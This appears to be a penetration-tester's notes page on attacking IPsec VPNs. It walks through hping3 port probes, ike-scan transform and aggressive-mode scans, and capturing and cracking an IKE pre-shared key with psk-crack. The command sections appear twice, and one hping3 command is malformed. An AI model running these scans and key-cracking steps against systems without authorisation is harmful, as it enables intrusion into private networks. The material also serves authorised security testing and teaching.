Attacking VPNs

The VPNs Hacker's Toolkit

IPsec tools: Used for building IPsec tunnels
IKE-scan: An IKE probing utility
PSK-crack: A tool for cracking PSKs used by IKE
OpenSSL: Client-server tools for SSL/TLS negotiations
VPN clients

VPN Hacking Methodology

Identify the VPN technology in use
Establish initial communications with the server; identify the authentication methods and encryption method in use
Perform a "handshake" with the server and look for information leaks.
Identify vulnerabilities for exploitation using leaked information.

Crafting Hping3 commands

# Send SYN packets 
hping3 -S -p 53 <TargetIP>

# Send UDP packets to port 500 (used by IKE)
hping3 --udp -p 500 <TargetIP>

# Bash scripts that takes udp.txt and sends probes to each UDP port number listed
for port in `cat udp.txt`; do echo TESTING UDP PORT: $port; hping3 -2- p $port -c 1 <TargetIP>; done

IKE-scan

IKE-scan attempts to communicate using the IKE protocol

# IKE-scan
# Uses defaults: 3DES encryption, SHA1 Hash, PSK Authentication, DH Group 2
ike-scan <TargetIP>

# Default SAs
ike-scan --trans=5,2,1,2 <TargetIP>

# This command will use the following:
# DES-CBD Encryption, MD5 Hash, PSK Auth, DH Group 1
ike-scan --trans=1,1,1,1 <Target IP>

# Newer method for specifying transforms
ike-scan --trans="(1=5,2=2,3=1,4=2)" <TargetIP>

# Runs scan in aggressive mode
ike-scan -A <TargetIP>

# If aggressive return a Auth=PSK response then it might be vulnerable. 
# Attempt to extract the key 
ike-scan -A <TargetIP> --pskcrack=pskhash

# If previous command works you will have a file named pskhash
# Attempt to crack the hash
psk-crack pskhash

IKEmulti

ikemulti.py tries multiple transforms

# Running ikemulti.py 
python ikemulti.py -i <TargetIP>

Aggressive Mode

Main mode can be thought of as a normal way of exchanging information
Aggressive mode is designed to speed up the process and perform a faster handshake
- Aggressive mode can leak information
- If this mode is used with a PSK the key itself can actually be extracted and then cracked before being used to authenticate

PreviousAttacking Kerberos NextDenial of Service

Last updated 1 year ago

Crafting Hping3 commands

# Send SYN packets 
hping3 -S -p 53 <TargetIP>

# Send UDP packets to port 500 (used by IKE)
hping3 --udp -p 500 <TargetIP>

# Bash scripts that takes udp.txt and sends probes to each UDP port number listed
for port in `cat udp.txt`; do echo TESTING UDP PORT: $port; hping3 -2- p $port -c 1 <TargetIP>; done

IKE-scan

IKE-scan attempts to communicate using the IKE protocol

# IKE-scan
# Uses defaults: 3DES encryption, SHA1 Hash, PSK Authentication, DH Group 2
ike-scan <TargetIP>

# Default SAs
ike-scan --trans=5,2,1,2 <TargetIP>

# This command will use the following:
# DES-CBD Encryption, MD5 Hash, PSK Auth, DH Group 1
ike-scan --trans=1,1,1,1 <Target IP>

# Newer method for specifying transforms
ike-scan --trans="(1=5,2=2,3=1,4=2)" <TargetIP>

# Runs scan in aggressive mode
ike-scan -A <TargetIP>

# If aggressive return a Auth=PSK response then it might be vulnerable. 
# Attempt to extract the key 
ike-scan -A <TargetIP> --pskcrack=pskhash

# If previous command works you will have a file named pskhash
# Attempt to crack the hash
psk-crack pskhash

Aggressive Mode

Main mode can be thought of as a normal way of exchanging information

Aggressive mode is designed to speed up the process and perform a faster handshake

Aggressive mode can leak information
If this mode is used with a PSK the key itself can actually be extracted and then cracked before being used to authenticate